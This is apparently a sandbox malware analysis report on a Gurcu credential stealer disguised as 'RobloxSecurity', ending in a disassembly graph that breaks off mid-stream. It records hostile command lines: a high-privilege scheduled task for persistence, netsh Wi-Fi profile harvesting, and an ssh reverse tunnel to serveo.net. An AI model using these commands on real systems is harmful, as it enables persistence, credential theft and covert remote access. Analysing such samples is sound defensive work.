                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:7
                                                                                                    Start time:16:17:12
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:chcp 65001
                                                                                                    Imagebase:0x7ff6bf650000
                                                                                                    File size:14'848 bytes
                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:8
                                                                                                    Start time:16:17:12
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\timeout.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:timeout /t 3
                                                                                                    Imagebase:0x7ff61b030000
                                                                                                    File size:32'768 bytes
                                                                                                    MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:10
                                                                                                    Start time:16:17:15
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f
                                                                                                    Imagebase:0x7ff76f990000
                                                                                                    File size:235'008 bytes
                                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:11
                                                                                                    Start time:16:17:15
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"
                                                                                                    Imagebase:0x1b8a9a90000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:12
                                                                                                    Start time:16:17:15
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                                                                                                    Imagebase:0x7ff677710000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:13
                                                                                                    Start time:16:17:15
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:14
                                                                                                    Start time:16:17:15
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:chcp 65001
                                                                                                    Imagebase:0x7ff6bf650000
                                                                                                    File size:14'848 bytes
                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:15
                                                                                                    Start time:16:17:15
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\netsh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:netsh wlan show profiles
                                                                                                    Imagebase:0x7ff6bc470000
                                                                                                    File size:96'768 bytes
                                                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:16
                                                                                                    Start time:16:17:15
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\findstr.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:findstr /R /C:"[ ]:[ ]"
                                                                                                    Imagebase:0x7ff6c7230000
                                                                                                    File size:36'352 bytes
                                                                                                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:17
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                                                                                                    Imagebase:0x7ff677710000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:18
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x10dd5580000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:19
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:20
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:chcp 65001
                                                                                                    Imagebase:0x7ff6bf650000
                                                                                                    File size:14'848 bytes
                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:21
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\netsh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:netsh wlan show networks mode=bssid
                                                                                                    Imagebase:0x7ff6bc470000
                                                                                                    File size:96'768 bytes
                                                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:22
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\findstr.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:findstr "SSID BSSID Signal"
                                                                                                    Imagebase:0x7ff6c7230000
                                                                                                    File size:36'352 bytes
                                                                                                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:23
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                                                                                                    Imagebase:0x7ff677710000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:24
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:25
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:chcp 65001
                                                                                                    Imagebase:0x7ff6bf650000
                                                                                                    File size:14'848 bytes
                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:26
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\netsh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:netsh wlan show profiles
                                                                                                    Imagebase:0x7ff6bc470000
                                                                                                    File size:96'768 bytes
                                                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:27
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\findstr.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:findstr /R /C:"[ ]:[ ]"
                                                                                                    Imagebase:0x7ff6c7230000
                                                                                                    File size:36'352 bytes
                                                                                                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:28
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                                                                                                    Imagebase:0x7ff677710000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:29
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:30
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:chcp 65001
                                                                                                    Imagebase:0x7ff6bf650000
                                                                                                    File size:14'848 bytes
                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:31
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\netsh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:netsh wlan show networks mode=bssid
                                                                                                    Imagebase:0x7ff6bc470000
                                                                                                    File size:96'768 bytes
                                                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:32
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\findstr.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:findstr "SSID BSSID Signal"
                                                                                                    Imagebase:0x7ff6c7230000
                                                                                                    File size:36'352 bytes
                                                                                                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:33
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\OpenSSH\ssh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                                                                                                    Imagebase:0x7ff734ff0000
                                                                                                    File size:946'176 bytes
                                                                                                    MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:34
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:35
                                                                                                    Start time:16:17:18
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\OpenSSH\ssh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                                                                                                    Imagebase:0x7ff734ff0000
                                                                                                    File size:946'176 bytes
                                                                                                    MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:36
                                                                                                    Start time:16:17:18
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:41
                                                                                                    Start time:16:17:22
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 8072 -s 1632
                                                                                                    Imagebase:0x7ff6065e0000
                                                                                                    File size:570'736 bytes
                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:42
                                                                                                    Start time:16:18:01
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x17a71230000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:44
                                                                                                    Start time:16:19:00
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x1ec7f190000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000002C.00000002.2953825020.000001EC01AD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:45
                                                                                                    Start time:16:20:00
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x167cfae0000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000002D.00000002.3553295709.00000167D1889000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:46
                                                                                                    Start time:16:21:00
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x1cf0ab30000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Disassembly

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:11.2%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:2.4%
                                                                                                      Total number of Nodes:578
                                                                                                      Total number of Limit Nodes:54
                                                                                                      execution_graph 41393 2b8b0d8 41397 2b8b1bf 41393->41397 41405 2b8b1d0 41393->41405 41394 2b8b0e7 41398 2b8b1e1 41397->41398 41399 2b8b204 41397->41399 41398->41399 41413 2b8b468 41398->41413 41417 2b8b45b 41398->41417 41399->41394 41400 2b8b1fc 41400->41399 41401 2b8b408 GetModuleHandleW 41400->41401 41402 2b8b435 41401->41402 41402->41394 41406 2b8b1e1 41405->41406 41407 2b8b204 41405->41407 41406->41407 41411 2b8b468 LoadLibraryExW 41406->41411 41412 2b8b45b LoadLibraryExW 41406->41412 41407->41394 41408 2b8b1fc 41408->41407 41409 2b8b408 GetModuleHandleW 41408->41409 41410 2b8b435 41409->41410 41410->41394 41411->41408 41412->41408 41414 2b8b47c 41413->41414 41416 2b8b4a1 41414->41416 41421 2b8ac08 41414->41421 41416->41400 41418 2b8b47c 41417->41418 41419 2b8ac08 LoadLibraryExW 41418->41419 41420 2b8b4a1 41418->41420 41419->41420 41420->41400 41422 2b8b648 LoadLibraryExW 41421->41422 41424 2b8b6c1 41422->41424 41424->41416 41425 2b8d458 41426 2b8d49e 41425->41426 41430 2b8d638 41426->41430 41433 2b8d628 41426->41433 41427 2b8d58b 41436 2b8cd30 41430->41436 41434 2b8d666 41433->41434 41435 2b8cd30 DuplicateHandle 41433->41435 41434->41427 41435->41434 41437 2b8d6a0 DuplicateHandle 41436->41437 41438 2b8d666 41437->41438 41438->41427 40855 29dd01c 40856 29dd034 40855->40856 40857 29dd08e 40856->40857 40862 6250ad4 40856->40862 40871 6251ea8 40856->40871 40875 6252bf8 40856->40875 40884 6251e97 40856->40884 40865 6250adf 40862->40865 40863 6252c69 40901 6250bfc 40863->40901 40865->40863 40866 6252c59 40865->40866 40888 6252d80 40866->40888 40892 6252e5c 40866->40892 40897 6252d90 40866->40897 40867 6252c67 40867->40867 40872 6251ece 40871->40872 40873 6250ad4 8 API calls 40872->40873 40874 6251eef 40873->40874 40874->40857 40878 6252c35 40875->40878 40876 6252c69 40877 6250bfc 8 API calls 40876->40877 40880 6252c67 40877->40880 40878->40876 40879 6252c59 40878->40879 40881 6252d80 8 API calls 40879->40881 40882 6252d90 8 API calls 40879->40882 40883 6252e5c 8 API calls 40879->40883 40880->40880 40881->40880 40882->40880 40883->40880 40885 6251e9e 40884->40885 40886 6250ad4 8 API calls 40885->40886 40887 6251eef 40886->40887 40887->40857 40890 6252da4 40888->40890 40889 6252e30 40889->40867 40908 6252e48 40890->40908 40893 6252e1a 40892->40893 40894 6252e6a 40892->40894 40896 6252e48 8 API calls 40893->40896 40895 6252e30 40895->40867 40896->40895 40898 6252da4 40897->40898 40900 6252e48 8 API calls 40898->40900 40899 6252e30 40899->40867 40900->40899 40902 6250c07 40901->40902 40903 62542f2 40902->40903 40904 625439c 40902->40904 40906 625434a CallWindowProcW 40903->40906 40907 62542f9 40903->40907 40905 6250ad4 7 API calls 40904->40905 40905->40907 40906->40907 40907->40867 40909 6252e59 40908->40909 40913 6258578 40908->40913 40938 6258568 40908->40938 40963 625428e 40908->40963 40909->40889 40914 6258591 40913->40914 40919 62585a4 40913->40919 40915 6258596 40914->40915 40916 62585d8 40914->40916 40917 62585b2 40915->40917 40918 625859b 40915->40918 40916->40919 40921 6258864 40916->40921 40922 62585e9 40916->40922 40917->40919 40925 62587d0 40917->40925 40926 625882c 40917->40926 40930 6258726 40917->40930 40931 62586de 40917->40931 40918->40919 40920 62587c2 40918->40920 40919->40930 40936 6259100 8 API calls 40919->40936 40937 6259110 8 API calls 40919->40937 40976 6257af8 40920->40976 40990 6257ba8 40921->40990 40922->40919 40922->40930 40922->40931 40980 6257b08 40925->40980 40986 6257b68 40926->40986 40930->40909 40966 6259100 40931->40966 40971 6259110 40931->40971 40932 6259100 8 API calls 40932->40930 40933 6259110 8 API calls 40933->40930 40936->40930 40937->40930 40939 6258591 40938->40939 40948 62585a4 40938->40948 40940 6258596 40939->40940 40941 62585d8 40939->40941 40942 62585b2 40940->40942 40943 625859b 40940->40943 40945 6258864 40941->40945 40946 62585e9 40941->40946 40941->40948 40947 6258726 40942->40947 40942->40948 40951 62587d0 40942->40951 40952 625882c 40942->40952 40956 62586de 40942->40956 40944 62587c2 40943->40944 40943->40948 40949 6257af8 8 API calls 40944->40949 40950 6257ba8 8 API calls 40945->40950 40946->40947 40946->40948 40946->40956 40947->40909 40948->40947 40957 6259100 8 API calls 40948->40957 40958 6259110 8 API calls 40948->40958 40949->40947 40950->40947 40954 6257b08 7 API calls 40951->40954 40953 6257b68 8 API calls 40952->40953 40953->40947 40955 62587d7 40954->40955 40959 6259100 8 API calls 40955->40959 40960 6259110 8 API calls 40955->40960 40961 6259100 8 API calls 40956->40961 40962 6259110 8 API calls 40956->40962 40957->40947 40958->40947 40959->40947 40960->40947 40961->40947 40962->40947 40964 6250bfc 8 API calls 40963->40964 40965 625429a 40964->40965 40965->40909 40967 6259122 40966->40967 40969 625911b 40966->40969 40996 6259130 40967->40996 40968 6259128 40968->40930 40969->40930 40972 6259122 40971->40972 40973 625911b 40971->40973 40975 6259130 8 API calls 40972->40975 40973->40930 40974 6259128 40974->40930 40975->40974 40977 6257b03 40976->40977 40978 6259110 8 API calls 40977->40978 40979 6259326 40977->40979 40978->40979 40979->40930 40982 6257b13 40980->40982 40981 62587d7 40981->40932 40981->40933 40982->40981 40983 6254590 7 API calls 40982->40983 40984 625bc2c 40983->40984 40984->40981 41099 625591c 40984->41099 40987 6257b73 40986->40987 40988 625d51c 40987->40988 40989 6259110 8 API calls 40987->40989 40988->40930 40989->40988 40991 6257bb3 40990->40991 40992 625cdd0 40991->40992 40993 6257b08 7 API calls 40991->40993 40994 6259110 8 API calls 40992->40994 40993->40992 40995 625cdd9 40994->40995 40995->40930 40997 6259170 40996->40997 40999 625914e 40996->40999 40998 6253678 8 API calls 40997->40998 41003 6259177 40998->41003 41001 625915c 40999->41001 41004 6253678 40999->41004 41001->40968 41002 6259198 41002->40968 41003->40968 41005 62536c4 41004->41005 41006 6253715 41005->41006 41008 62539fa 41005->41008 41011 6253725 41005->41011 41006->41006 41007 6253964 41007->41002 41008->41007 41015 62531cc 41008->41015 41010 6254086 41010->41007 41019 62591b0 41010->41019 41023 62591a0 41010->41023 41011->41007 41011->41010 41027 6253444 41011->41027 41016 62531d7 41015->41016 41018 625eac3 41016->41018 41030 6254590 41016->41030 41018->41007 41020 62591f6 41019->41020 41021 6250bfc 8 API calls 41020->41021 41022 6259219 41020->41022 41021->41022 41022->41007 41024 62591f6 41023->41024 41025 6250bfc 8 API calls 41024->41025 41026 6259219 41024->41026 41025->41026 41026->41007 41028 625c350 SendMessageW 41027->41028 41029 625c3bc 41028->41029 41029->41011 41031 6254594 41030->41031 41032 62545dd 41031->41032 41036 62582af 41031->41036 41041 6257fc8 41031->41041 41070 6257fb9 41031->41070 41032->41018 41037 625826a 41036->41037 41037->41036 41038 62582ce 41037->41038 41039 6256ac0 7 API calls 41037->41039 41040 6256ad0 7 API calls 41037->41040 41038->41032 41039->41037 41040->41037 41042 6258001 41041->41042 41046 625809f 41042->41046 41067 2b8fa60 CreateWindowExW CreateWindowExW 41042->41067 41043 62578d0 7 API calls 41044 625810b 41043->41044 41045 